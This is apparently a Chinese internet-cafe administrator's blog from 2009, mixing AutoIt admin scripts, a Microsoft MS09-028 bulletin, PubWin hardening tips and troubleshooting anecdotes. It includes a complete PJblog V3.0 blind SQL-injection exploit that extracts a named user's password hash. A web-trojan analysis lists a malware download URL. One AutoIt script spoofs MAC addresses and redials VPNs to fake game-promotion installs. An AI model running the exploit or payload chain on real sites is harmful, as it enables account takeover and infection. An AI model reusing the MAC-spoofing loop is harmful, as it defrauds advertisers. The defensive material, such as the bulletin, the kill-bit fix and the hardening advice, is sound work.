复制内容到剪贴板程序代码

#include
_RunDOS("dir e:\*.rmvb /b /s >c:\1.txt")
$file = FileOpen("c:\1.txt", 0)                  ;生成影片列表文件，如e:\1.rmvb

; Check if file opened for reading OK
If $file = -1 Then
    MsgBox(0, "Error", "Unable to open file.")
    Exit
EndIf

; Read in lines of text until the EOF is reached
While 1
    $line = FileReadLine($file)
    If @error = -1 Then ExitLoop
$mov = StringTrimLeft ($line, 2)            ;去除左边两字符 e:，取\1.rmvb
$video = StringTrimRight ($line, 5)        ;去除右边5个字符 .rmvb,取e:\1
$smil = FileOpen($video & ".smil", 10)  ;生成smil文件，保存在rmvb目录下
FileWrite($smil, "file:///\\192.168.0.x\e" & $mov)  ;填充smil内容 file:///\\192.168.0.x\e\1.rmvb
FileClose($smil)
Wend

FileClose($file)
FileDelete("c:\1.txt")

2、邮件通知机器狗穿透
复制内容到剪贴板程序代码

#include
#include  <SmtpMailer.au3>
_RunDOS("fc z:\IEXPLORE.EXE C:\Progra~1\Intern~1\IEXPLORE.EXE >c:\1.txt")   ;FC的利用
If $sizei <> 87 Then
Call("iexplore")
EndIf
$start = DirGetSize("C:\Documents and Settings\All Users\「开始」菜单\程序\启动") ;启动项大小比较
If $start <> 84 Then
    Call("startdf")
Else
EndIf                               ;此外还有几种方法检测某一文件或进程，在此不再一一列举
Func startdf()
    $s_SmtpServer  =  "smtp.21cn.com"      ;  smtp  address  for  the  smtp-server  to  use  -  REQUIRED
$s_FromName  =  "XX网吧"        ;    name  from  who  the  email  was  sent
$s_FromAddress  =  "发送邮件的邮箱"    ;    address  from  where  the  mail  should  come
$s_ToAddress  =  "接收邮件的邮箱"
$s_Subject  =   @ComputerName & " 启动项被穿透!"
$as_Body  =  "机器名是" & @ComputerName
$s_AttachFiles  =  ""
$s_CcAddress  =  ""
$s_BccAddress  =  ""
$s_Username  =  "邮箱用户名"
$s_Password  =  "邮箱密码"
$IPPort=25
$ssl=0
Global  $oMyRet[2]
Global  $oMyError  =  ObjEvent("AutoIt.Error",  "MyErrFunc")
$rc  =  _INetSmtpMailCom($s_SmtpServer,  $s_FromName,  $s_FromAddress,  $s_ToAddress,  $s_Subject,  $as_Body,  $s_AttachFiles,  $s_CcAddress,  $s_BccAddress,  $s_Username,  $s_Password,  $IPPort,  $ssl)
EndFunc

Func iexplore()
    $s_SmtpServer  =  "smtp.21cn.com"      ;  smtp  address  for  the  smtp-server  to  use  -  REQUIRED
$s_FromName  =  "XX网吧"        ;    name  from  who  the  email  was  sent
$s_FromAddress  =  "发送邮件的邮箱"    ;    address  from  where  the  mail  should  come
$s_ToAddress  =  "接收邮件的邮箱"
$s_Subject  =  @ComputerName & " IEXPLORE被穿透!"
$as_Body  =  "机器名是" & @ComputerName
$s_AttachFiles  =  ""
$s_CcAddress  =  ""
$s_BccAddress  =  ""
$s_Username  =  "邮箱用户名"
$s_Password  =  "邮箱密码"
$IPPort=25
$ssl=0
Global  $oMyRet[2]
Global  $oMyError  =  ObjEvent("AutoIt.Error",  "MyErrFunc")
$rc  =  _INetSmtpMailCom($s_SmtpServer,  $s_FromName,  $s_FromAddress,  $s_ToAddress,  $s_Subject,  $as_Body,  $s_AttachFiles,  $s_CcAddress,  $s_BccAddress,  $s_Username,  $s_Password,  $IPPort,  $ssl)
EndFunc

附SmtpMailer.au3下载
点击下载此文件

3、自动绑定本机MAC与网关MAC
采用WMI方式，但在网吧维护软件当道的今天，实用价值不大，仅供参考。
复制内容到剪贴板程序代码

$wbemFlagReturnImmediately = 0x10
$wbemFlagForwardOnly = 0x20
$strComputer = "."
$objWMIService = ObjGet("winmgmts:\\" & $strComputer & "\root\CIMV2")
$colItems = $objWMIService.ExecQuery("Select * FROM Win32_NetworkAdapterConfiguration Where IPEnabled = TRUE", "WQL", _
$wbemFlagReturnImmediately + $wbemFlagForwardOnly)
$colComputers = $objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
For $objItem In $colItems
;获取网关
$LocalGateway= $objItem.DefaultIPGateway(0)
;获取计算机名
$LoaclHostName=$objItem.DNSHostName
;获取IP地址
$LocalIP=$objItem.IPAddress(0)
;获取DNS首选
$LocalDns1= $objItem.DNSServerSearchOrder(0)
;获取DNS备用
$LocalDns2= $objItem.DNSServerSearchOrder(1)
;获取子掩网码
$LocalSubnetmask= $objItem.IPSubnet(0)
;获取网卡名称
$b=$objItem.Description
Next
;获取本机和网关的MAC
$MAC = _GetMAC ($LocalIP)
$wgMAC = _Gey ($LocalGateway)
RunWait(@ComSpec & " /c " & " ARP -d ", "", @SW_HIDE)
;绑定本机IP和MAC
RunWait(@ComSpec & " /c " & " ARP -S "& $LocalIP &" "& $MAC &"", "", @SW_HIDE)
;绑定路由网关和MAC
RunWait(@ComSpec & " /c " & " ARP -S "& $LocalGateway &" "& $wgMAC &"", "", @SW_HIDE)

Func _GetMAC ($LocalIP)
  Local $MAC,$MACSize
  Local $i,$s,$r,$iIP

  $MAC = DllStructCreate("byte[6]")
  $MACSize = DllStructCreate("int")

  DllStructSetData($MACSize,1,6)
  $r = DllCall ("Ws2_32.dll", "int", "inet_addr", "str", $LocalIP)
  $iIP = $r[0]
  $r = DllCall ("iphlpapi.dll", "int", "SendARP","int", $iIP,"int", 0,"ptr", DllStructGetPtr($MAC),"ptr", DllStructGetPtr($MACSize))
  $s    = ""
  For $i = 0 To 5
      If $i Then $s = $s & "-"
      $s = $s & Hex(DllStructGetData($MAC,1,$i+1),2)
  Next
  Return $s
EndFunc

Func _Gey ($LocalGateway)
  Local $MAC,$MACSize
  Local $i,$s,$r,$iIP

  $MAC = DllStructCreate("byte[6]")
  $MACSize = DllStructCreate("int")

  DllStructSetData($MACSize,1,6)
  $r = DllCall ("Ws2_32.dll", "int", "inet_addr", "str", $LocalGateway)
  $iIP = $r[0]
  $r = DllCall ("iphlpapi.dll", "int", "SendARP","int", $iIP,"int", 0,"ptr", DllStructGetPtr($MAC),"ptr", DllStructGetPtr($MACSize))
  $s    = ""
  For $i = 0 To 5
      If $i Then $s = $s & "-"
      $s = $s & Hex(DllStructGetData($MAC,1,$i+1),2)
  Next
  Return $s
EndFunc

MS09-028安全公告

180045@163.com(毒药) — Thu,30 Jul 2009 04:41:15 +0800
MS09-028:Microsoft DirectShow远程执行代码漏洞
微软发布2009年7月安全公告
修复 MPEG-2视频漏洞
美国当地时间7月14日下午(北京时间7月15日凌晨)，微软向全球用户发布了7月份安全更新公告，共提供了6个漏洞补丁。正饱受攻击的“MPEG-2视频漏洞”在本次更新中得到修复。

引用内容
版本： 1.0

摘要

此安全更新可解决 Microsoft DirectShow 中一个公开披露和两个秘密报告的漏洞。如果用户打开特制的 QuickTime 媒体文件，这些漏洞可能允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

建议。大多数客户均启用了“自动更新”，他们不必采取任何操作，因为此安全更新将自动下载并安装。尚未启用“自动更新”的客户必须检查更新，并手动安装此更新。

对于管理员、企业安装或者想要手动安装此安全更新的最终用户，Microsoft 建议客户使用更新管理软件立即应用此更新或者利用 Microsoft Update 服务检查更新。

受影响的软件

操作系统组件最大安全影响综合严重等级此更新替代的公告
DirectX 7.0
Microsoft Windows 2000 Service Pack 4
DirectX 7.0
远程执行代码
严重
MS08-033

DirectX 8.1
Microsoft Windows 2000 Service Pack 4
DirectX 8.1
远程执行代码
严重
MS09-011

DirectX 9.0
Microsoft Windows 2000 Service Pack 4
DirectX 9.0*
远程执行代码
严重
MS09-011

Windows XP Service Pack 2 和 Windows XP Service Pack 3
DirectX 9.0*
远程执行代码
严重
MS09-011

Windows XP Professional x64 Edition Service Pack 2
DirectX 9.0*
远程执行代码
严重
MS09-011

Windows Server 2003 Service Pack 2
DirectX 9.0*
远程执行代码
严重
MS09-011

Windows Server 2003 x64 Edition Service Pack 2
DirectX 9.0*
远程执行代码
严重
MS09-011

Windows Server 2003 SP2（用于基于 Itanium 的系统）
DirectX 9.0*
远程执行代码
严重
MS09-011

不受影响的软件

操作系统
Windows Vista、Windows Vista Service Pack 1 和 Windows Vista Service Pack 2

Windows Vista x64 Edition、Windows Vista x64 Edition Service Pack 1 和 Windows Vista x64 Edition Service Pack 2

Windows Server 2008（用于 32 位系统）和 Windows Server 2008（用于 32 位系统）Service Pack 2

Windows Server 2008（用于基于 x64 的系统）和 Windows Server 2008（用于基于 x64 的系统）Service Pack 2

Windows Server 2008（用于基于 Itanium 的系统）和 Windows Server 2008（用于基于 Itanium 的系统）Service Pack 2

微软的安全公告:

http://www.microsoft.com/china/technet/security/bulletin/MS09-028.mspx

（以上链接均连到第三方网站）

这个补丁大家还是趁早打上为妙。

遇到个奇怪的事儿

180045@163.com(毒药) — Thu,30 Jul 2009 04:35:04 +0800
      好久没有碰着需要动脑子的活儿了，NND的今儿就遇上了一回。
    晚上我在修机子的时候，看见一台机子显示器的分辨率大大的，以为是显卡驱动丢失了或者什么的，就还原了下系统，谁知道还原后还是一样，设备管理器上声卡与显卡都有黄色惊叹号！初初以为是显卡的兼容性问题，拔了隔壁机子的显卡装上——问题依旧在，几度笑君呆。
    于是乎，头脑发热的我按照万能的排除法逐一排除了：主板、CPU和内存，之后又想到可能是电源的供电问题，经测试排除。这时候剩下的就只有硬盘了，我无奈地接上备用硬盘：吗的~奇迹发生了，最不可能发生的事情恰恰地出现在我的眼前。我拿起那个换下来的硬盘看了良久，心有不甘的全盘刻了一次，再找了台看起来不错的机子装上，映入我眼里的仍然只有两个黄色惊叹号！
    为什么硬盘会出现这种情况？直到现在我对此还是一无所知。各位看君若有解答，不胜感激。
    注：问题硬盘刻盘顺畅、检查无坏道、无硬还原之类的东西存在。

最新PUBWIN广告(7月版)

180045@163.com(毒药) — Fri,24 Jul 2009 20:39:49 +0800
     万恶的PUBWIN广告又来了！
     继上一次的广告事件后，PUBWIN公司好像闲不着似的，于今日又把开机登陆界面动画IP改了。
之前是
58.211.138.80
58.211.138.81
58.211.138.82
三个（含有迅闪三层的IP），
现在是
203.110.169.210
203.110.169.211
203.110.169.212
203.110.169.215
203.110.169.218

      经IP138查证，IP为上海市图像数据通信有限公司，不知道浩艺又在打什么主意。反正兵来将挡、水来土淹，ROUTEROS封以下地址，其它路由雷同。

最后到PUBWIN服务器上先停止管理器，把D:\epserver\PubwinServer\appServ\server\webapps\NetCafe\advertise里面的文件删除。开启服务管理器，完成！

庆祝备案通过

180045@163.com(毒药) — Thu,23 Jul 2009 17:05:55 +0800
      等待了一个多星期，今天查询已经通过备案，心情大爽。
    之前的wooker.com.cn因为没备案而查封，以致BLOG也停了一个多星期。在这期发生了很多事，不提也罢。
    Everything will be fine!

电信机房的技术员就是牛

180045@163.com(毒药) — Sat,18 Jul 2009 09:05:43 +0800
      某日清晨，经过一夜苦战某XX游戏的我正想躺上床上休息，谁知电话就不合时宜的打了过来（在这里有一个规律，每次我将电话设成静音直到开启声音的期间都没有来电骚扰）：XX网吧掉线。“掉线嘛~正常，等几分钟”，我慢条斯理的回应着。
    于是乎就那么的过了几分钟，笔记本启动完成（什么卡巴、MSSQL、VM之类大一堆的东西，低配的东西的就是这样），我随手就打上了PING x.x.x.x，正想着打电话回去叫网管重启路由、光纤收发器的时候，却发现反馈信息有点怪了：Reply from x.x.x.x: Destination host unreachable，这不就是传说中的目的主机不可到达么。接着再tracert了一下，内容如下：
1    <1 ms    <1 ms    <1 ms  x.x.x.x
2    11 ms     1 ms     1 ms  x.x.x.x
3    <1 ms    <1 ms    <1 ms  x.x.x.x
4     3 ms     3 ms     2 ms  a.a.a.a
5  a.a.a.a reports: Destination host unreachable.
      呵呵，这回有点头绪了，应该是电信设备路由表中与网吧IP的路径“消失”了。二话不说，我直接的打了个电话到电信机房告诉这情况，以下是对话：
“喂，你好，这里是XX网吧，掉线了。”
“嗯，请问IP。”
“X.X.X.X”
“我这显示上线，你单机试一下吧，还有收发器也重启下。”
“不是的，这回不是TIME OUT，追踪路由提示主机不可到达。”
“什么追踪？我不是很懂你的意思。”
“额，那我还是单机试一下吧。”
    汗！我还真差点抓狂了，但对着电信的老大爷们我这低阶层人员却不能发作。无奈地回到网吧接上单机，还是不通（通才怪）。随后我又接回ROUTEROS里看了看ARP列表，网关MAC清晰在目，至此我也没有什么办法了，只好再打了个电话到机房报障，接着就以迅雷不及掩耳之势打车回家，睡觉！
    是夜，我怀着关心之情与那间网吧的网管聊了下天，问起了这事，他说：搞了二个多小时，来了又跑，跑了又来，说是回机房搞什么来着。
    。。。。。。
    牛人做牛事，期望某日某些电信技术员可以破解1+1，OOXX猜想，相对论……
    哦，记得电信那啥叫的是工程师，也想起当年偶在IBM蓝色快车的时候——也叫工程师。

关于防止PUBWIN破解的几点建议

180045@163.com(毒药) — Wed,08 Jul 2009 19:08:20 +0800
     一直以来,PUBWIN的安全漏洞成为大多数网管都很头痛的问题，升级客户端版本也不现实——没道理升一次就换一次母盘吧，那样做对大家的身心都会受到或多或少的损害；再者就是现在的破解软件也跟着PUBWIN的尾巴，有时升级频率比PUBWIN还要狂，今天你封特征码PAV，明天我就搞个随机特征码的破解！
     其实转换一下思路，这事儿毕竟是关系着网吧老板利益的，该花的钱应该花，只要花的值得。
     一、利用PUBWIN的PAV防止破解软件的运行。
     二、利用组策略限制破解软件的运行。
     三、无论你用的是易游、网维或其它的软件，客户机都应该装上一个网络版冰点的种子文件，其作用就是当某些软件（例如虚拟桌面）阻止了客户机的正常关机，用冰点控制台就可以在收银台进行重启、关机等操作了。这里要注意的一点是除了这两个操作要教会收银，其他的就不要让收银员动了，这里尽可以吓唬吓唬。
     四、利用[网吧逃费检查官]等软件，将服务端装上PUBWIN后台，接收端放在收银，设置方面网上有教程。当软件运行后，在客户端进行解锁或破解等方法，接收端都会显示得到。
     五、当然就是作好服务器和控制台安全设置，这里不作详述了。
     以上的方法已经在几间网吧实践，破解或玩游戏卡机收银员第一时间会知道，而我，也乐得清闲。

网马分析-BDATuner.MPEG2TuneRequest Stack Overflow Exp

180045@163.com(毒药) — Tue,07 Jul 2009 00:37:16 +0800
漏洞名称： BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID：  0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
组件名称：Microsoft DirectShow(msvidctl.dll)
组件版本：Possible all avaliable versions
信息来源：狼在笑
挂马页面：http://www.xk88.com。
挂马情况：

Log is generated by FreShow.
[wide]http://www.xk88.com
    [script]http://www.xk88.com/pop.js
    [script]http://yucibaby.com/t.js
    [frame]http://33qqkk2.3322.org/aa/a1a.htm?4
        [frame]http://33qqkk2.3322.org/aa/index.htm
            [script]http://33qqkk2.3322.org/aa/go.jpg
                经过多处跳转后，下载病毒：
                [object]http://milllk.com/wm/svchost.exe
本漏洞提供者“狼在笑”表示，在SP2下，未屏蔽CLSID情况下，木马会100%下载成功，但是由于条件限制，本人并未测试，但是基本与Microsoft DirectShow有关的漏洞，相信命中率都是很高的，因为Microsoft DirectShow漏洞微软并未给出升级补丁。

在此非常感谢“狼在笑”这位朋友热心提供漏洞个信息！

临时解决办法：
将以下代码保存为注册表，开机导入即可。因条件限制，目前还不清楚屏蔽此CLSID对网吧系统影响的严重程度！
引用内容
Windows Registry Editor Version 5.00

#BDATuner.MPEG2TuneRequest Stack Overflow Exploit
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

记一次郁闷的杀毒过程

180045@163.com(毒药) — Sun,05 Jul 2009 17:45:18 +0800
       前两天老板的笔记本中毒了，中毒过程经他的描述无非就是上网浏览网页时被JS木马搞了一下，进程狂飚到50个以上，后来他自己下载了360和金山的AV终结者进行杀毒，无果。
     当我把笔记本拿到手上的时候，病毒似乎已经没有发作，这是好事哦~于是我就屁颠屁颠的在网吧的共享文件里拉了个KAV7装上，安装完成——重启完全一气呵成，丝毫感觉不到“某马到此一游”的症状。可等到系统重启完成进入桌面后，我才发现问题出来了，KAV7无法更新（更新服务器地址错误）！SHI~T！
PING 路由正常
PING 外网随便一下IP正常
局域网共享访问正常
。。。。。。
    非典型性问题，什么都好，但就是不能作域名解析，DNS好像被本地强J了。紧接下来查看HOSTS、重新设置网卡属性、修复WMI和IE强力修复等一切的一切我能想得到的都做了一遍，但PING域名还是不通。最后我火起来把整个系统都覆盖安装了一次，还是不行！出于时间关系，我只好叫老板把要保存的文件备份重装了一遍了事。
    第一次碰到这种事情，很是郁闷~若是时间允许的话，我还想着把笔记本带回家用ADSL来上网，继续找原因。



易游之IE任我行

180045@163.com(毒药) — Sat,04 Jul 2009 09:11:56 +0800
    接触易游已经差不多两个月了，可以说除了它劫持IE首页的流氓行为之外其它方面也确实不错，三层速度快、千M网络更新能稳定在40M/S左右，但功不能抵过，不能自定义自己网吧的IE首页确实令网管兄弟们感觉十分不爽，所以我们就要拿起手中的鼠标来反抗易游的流氓行为。
    一、先在易游管理端里设置一下你自己想定义的IE首页，点保存。
    二、在服务器进入USERDATA$目录，找到GLOBALCONFIG里的setmenu.dat（这个文件可以用记事本打开，里面可以看到STARTPAGE这一项，默认为易游的百度搜索页）文件，权限作EVERYONE只读设置。

注：先在高级里把父继承去掉再添加EVERYONE。
    三、关闭易游管理端，重新运行，至此完成。
    效果如下：

     这个图我们可以看到易游是每4个小时执行一次自动命令（不了解它会执行些什么，但肯定会检测IE首页），在易游2008测试通过，07版没有研究。

PJblog V3.0 0day Vbs版漏洞利用工具（检测工具）

180045@163.com(毒药) — Sat,04 Jul 2009 07:17:41 +0800
       早早的爬起来，闲着无事就到了前辈们的blog里溜达，不留神的发现了这个漏洞，立马冷汗嗖嗖的，速度为自己的博客打了补丁，还好~未为晚也！
用法：Cscript.exe Exp.vbs 要检测的论坛网址要检测的用户名

复制内容到剪贴板程序代码
If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜！存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET",PostUrl,False
        .Send ()
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function

PUBWIN的特征码提取

180045@163.com(毒药) — Sat,04 Jul 2009 02:44:12 +0800
      这工具其实也是在网上找到的，但现在很多的链接都已经失效了，基本上都给别人当成了赚钱的工具~本来就是一开放软件，何必搞的那么神秘！
    这软件也不必再做什么说明，简单上手，生成特征码后加入后台（服务端0804后的版本）的恶意软件列表中，下面的客户机重启就生效了。
    不过这也就防一般的菜鸟，因为客户端版本的缘故——旧的版本不能防止已经屏蔽的软件在虚拟盘里运行，所以从另一方面来说，配合组策略限制等等的方法也是必须的。
点击下载此文件
注：压缩包里已包含了十多个PUBWIN破解软件的特征码，包括网吧幽灵、虚拟桌面等软件。
    我们一直在斗争着~

如此的系统更新-易游

180045@163.com(毒药) — Fri,03 Jul 2009 18:48:38 +0800
    为什么我要拿这个来说事呢？因为某天我差点被它阴了一把，今天记起就在这里说说。
    首先，让我们先了解一下易游[系统更新项]的说明——
    功能介绍：直接为用户更新操作系统补丁并透过还原保留，让网吧所有客户机的操作系统处于最新状态，显著提升系统安全性。

    一开始，我还老天真的认为易游这个功能的开发很强大，已经远远跑在了其他网维软件的前端。但经过那天——对，就是那天，我才明白我是被忽悠了。事情经过：那天刻完一间网吧的系统后，我发现没有把自己的某个程序添加到启动项，加上自己又不想用易游的那个[添加启动项]（为什么？死性不改‘S blog已经说得很清楚明白），于是就记起了这个所谓的易游[系统更新项]来做了一个AU3脚本以冒充系统补丁作更新，但是当我按照操作把客户机重启了“两次”后，发觉自己开机脚本已经运行了一遍。老天！至此我才明白那“两次”是什么概念：无非就是把系统闪断保护，第一次启动是把客户设置成重启后保护，那么第二次就是恢复保护了。汗颜~无语！怪不得这个[系统更新项]可以做导入注册表、安装系统补丁诸如此类的事情了。
    易游啊！这点子是不错，可是说的悬乎就太过了。几年前用冰点的年代，我就已经用过控制台设置Reboot Thawed Locked来更新C盘系统，其实也就是那么个回事儿。

易游2008之IP分流篇

180045@163.com(毒药) — Fri,03 Jul 2009 06:05:11 +0800
      星期五晚上接到网吧电话，说客户机进系统的时候超级的慢，什么也打不开。我当场直觉的认为一是交换机、二就是易游服务器的设置有问题，因为按总机数来说现在也不过带着300台，不可能会发生卡机的现象。

    于是我忙乱的赶回网吧开了台客户机，发觉问题大大的，因为早上停了下电坏了三个H3C S1224，现在接的是旧的TP-LINK千M交换机。“网络风暴”？这念头一闪而过，随即又排除了：受影响的是第一个IP段的机子，第二个IP段的机子连到了节点服务器，没人反映说卡。我唯有无奈的进机房看了看易游管理端的设置——什么问题也没发现。看服务器网卡的流量，最高也不过30M/S。

    就这样瞎忙了半个小时，忽然外面的机子全部正常了。严重的无语！

    。。。。。。。。。

    。。。。。。。。。

    次日，因为问题根源没找到，我早早的就回到了网吧，到了接近中午人满的时候，昨天那怪现象又出现了！F U~

      带着恼怒的心情，我再次进跑机房看易游的服务器流量——正常！网络——正常！最后我下意识的打开了网卡属性，猛然发现第二张网卡的子网掩码为/24。天啊~怪不得啊怪不得，/24的掩码只有一个段，另一个段的机子根本就连不上。就是说，所有第一个IP段的机子在装了易游之后的十多天跑的都是第一张网卡，这样不卡死才怪！

    立马改回/23，世界清静了。我在回复老板的时候说：“有一张网卡驱动丢了，重装就没事了。”

    绝不能承认这低级错误是自己犯的，我一向正确。

PUBWIN火警?

180045@163.com(毒药) — Fri,03 Jul 2009 05:59:41 +0800
小小的被收银MM耍了一下。

       今晚在吃饭期间，那个令我恐惧的手机铃声再次在我耳边响起——网管报告说网吧所有机子都卡住了，重启后又点不了任何东西。因为有了上一次易游的教训，我下意识就断定了又是服务器出的问题，于是立马在附近找了间网吧连进了自己网吧的服务器。隔了五分钟不到，正当我还是百思不得其解的时候网管又打电话过来说机子已经好了，原因没说。

       吃过饭后，我带着一串串的疑问回到了网吧，经过对几个网管的询问，原来是收银MM无意间按了PUBWIN控制台的安全项（也不知是不是太无聊乱按的），于是全场机子都弹出了一个白色框框，鼠标不能移动，什么操作也不行。我一听这事乐了！上个星期才在死性不改的BLOG里看到这档事，才知道突然的就发生在眼前，哈哈~真的很太逗了~只是可怜了我在这段时间和易游客服聊天的电话费了。

      第一次的偶遇，值得纪念！那MM，更值得记——恨！

由整理事物开始

180045@163.com(毒药) — Fri,03 Jul 2009 05:57:38 +0800
终于把500台机器都更换了系统，历时半个月的工程告一段落。扳扳手指头，自己一个人做了一半，想起还真是痛苦无比，只是想到日后管理的方便，就一个字：值。

       可能是心情放松的关系，晚上我很冲动的把房子里看不顺眼的东西都整理了个遍，最后有条理的把自己以前丢下的事情一一列了出来：

一、CCNA

       说到家里的CCNA这本书，还是07年下半年的产品，当时我百无聊赖的想充电，于是便神经的把这本书买了回来，今晚看到这书的时候，发觉自己原来连网络分几层都忘记得一干二净，难道年纪越大越容易被外事迷惑以致抛弃原来的目标？百思不得其解。

二、电吉他与音箱

       读大一的时候从《同桌的你》开始到毕业，都是一把普通的练习琴在陪伴着我，厚茧一遍又一遍的进行着新陈代谢，那是激情燃烧的岁月……言归正传吧，作为一名“狂热”的音乐爱好者，我在两个多月前又买回了一把IBANEZ的国产琴和一个罗兰的小箱子，又花了一个月的时间记起了许多已忘却的和弦，只是到今天，吉他上的六根弦已被我拆下扔进了垃圾筒，箱子被包得严密的放进了包装箱——我不曾放弃，只是无能为力。

三、禅悟人生

       没错！这是一本书名，这是和老婆逛街时买的，买之前看着很有理，买回来后看了一半又放下了，为什么呢？别问我，我也不知道。俗事烦身，也许是一个很好的籍口吧。

       套用小星星一句话：“不知何年何月，得偿所望。”我还是在慢慢地期待着。

由MAC引发的AU3

180045@163.com(毒药) — Fri,03 Jul 2009 05:53:48 +0800
这段时间网上好像出现了好多推广，有游戏弹窗的，有IE首页的，因耐不住寂寞，我也随便找了家公司来做游戏推广。但看着那基数自然缓慢的增长，我却感到很郁闷！为啥的？太慢了！于是经过长达一个通宵的研究，现在在家里也可以刷N家网吧的流量了，代价就是电费。

复制内容到剪贴板程序代码
#include
$file = FileOpen("mac.txt", 0)                 ============>以只读方式打开MAC地址文件
While 1                                                  ============>循环
   $value = FileReadLine($file)               ============>读取第一行内容,每行一个MAC地址，8位，不带"-"或":"号
    If @error = -1 Then ExitLoop
RegWrite("这里填写关于网卡的注册表路径，具体百度", "NetworkAddress", "REG_SZ", $value) =======>改写MAC
_RunDOS("devcon disable *DEV_网卡代码*")      ==========>停用网卡，devcon程序网上下载
_RunDOS("devcon enable *DEV_网卡代码*")       ==========>启用网卡
Sleep(8000)                                                          ==========>停止8秒，具体时间慢慢摸索
RunWait("ping.bat")                                               ==========>这里编写一个PING外网IP的批处理，以查看网络是否连通
RunWait("net.bat")                                                  ==========>创建一个网吧VPN拔号的批处理，例如:rasdial VPN名称用户名密码
Run("game.exe")                                                   ===========>运行游戏推广程序
Sleep(3000)                                                           ===========>停止3秒
ProcessClose("game.exe")                                    ============>关闭推广程序
RunWait("pppdis.bat")                                           ============>断开VPN连接的批处理，代码rasdial 名称 /disconnect
WEnd                                                                      ============>循环直到最后一行
FileClose("mac.txt")                                                =============>关闭打开的MAC地址文件

       当然。。以上的批处理也可以用AU3的_RUNDOS函数来实现，但是因为它是在后台运行，所以有什么问题的时候就不好调试，还是批处理直观些。

       忘了说，若是用的电信宽带，最好配一个路由，直接连MODEM有个问题就是重新拔号时，因为MAC改变了，设备有个老化时间，会导致几十秒内都不能重新拔号，汗一个！

poison's blog

关于某事

Microsoft 安全公告摘要（2010 年 8 月）

Microsoft 安全公告摘要（2010 年 7 月）

『山水音乐节』

计算机安全员考试题库

最近碰到的故障两则

口罩姬爱川动漫热舞

软件介绍

网吧正版化之路还有多远?

Adobe Flash Player(10.1.53.64) for IE

Microsoft 安全公告摘要（2010 年 6 月）

删除系统中已卸下的隐藏设备

SuperOem7 V2 Win7激活 NT6正版体验 最好用的激活程序

『静』

AU3全汉化UDF第二版

Sugarsync云存储，Dropbox后的选择！

体验SugarSync 强大功能

屏蔽PUBWIN2009开机动画

网上再现“Android女”人美唱功绝

添加、去除win7桌面IE图标方法

IE6，滚回你的老窝！

利用knlps关闭易游(pclx.exe)右下角弹窗广告

电吉他之神！不是经典不发！

Microsoft 安全公告摘要（2010 年 5 月）

让IE8界面换成经典的IE6

QQ微博邀请码自动获取软件

谷歌LOGO——吃豆子（哈哈，很好玩）

禁用批处理CMD窗口的关闭按钮

一句批处理移动同类文件

提取易游用户磁盘

网站备案拍照又掀波澜，站长接入商需联签承诺书

最新QQ微博邀请码——继续发放

PowerBasic9.0中文汉化版

取消Pjblog半静态列表模式下的分类图标

Google已经获得www.baidu.com.sb域名

影著协回应质疑：未对网吧重复收费

博客换模板，导致收录下降

五洲回响授权文件（licence.zkm）的加密方式

从博客到微博的转变——5聊，真的很无聊

PUBWIN2007同步代理提示失败

如果这是男声

用Netcfg卸载易游cowman network

大家是不是都读错了光纤二字？

QQ概念版在WIN7下的问题与亮点

Win7 服务按需优化批处理

Microsoft 安全公告摘要（2010 年 4 月）

十个坚持博客的理由

查壳工具PEiD 0.94 For WIN7 版本

海豚音、绵羊音都已经过时了，惊世骇俗的“烈马音”登场

批处理整理Hosts文件（删除无效链接、加快IE启动速度）

Radmin 自动连接(AU3版本)

比较文本批处理

Radmin自动填密码工具

Microsoft 安全公告摘要（2010 年 3 月）

WIN7技巧集

WIN7显示器驱动停止响应另类解决方案

关于易游破坏分区表病毒的解决方案

Microsoft 安全公告摘要（2010 年 2 月）

数据被恢复，心情很郁闷

解决易游E盘文件夹不能清空问题

WINPCAP的AU3运用

AU3音乐键盘

快速关机重启函数

本是同根生；相煎何太急

破解PUBWIN非法检测工具(流星无语)过程中的发现

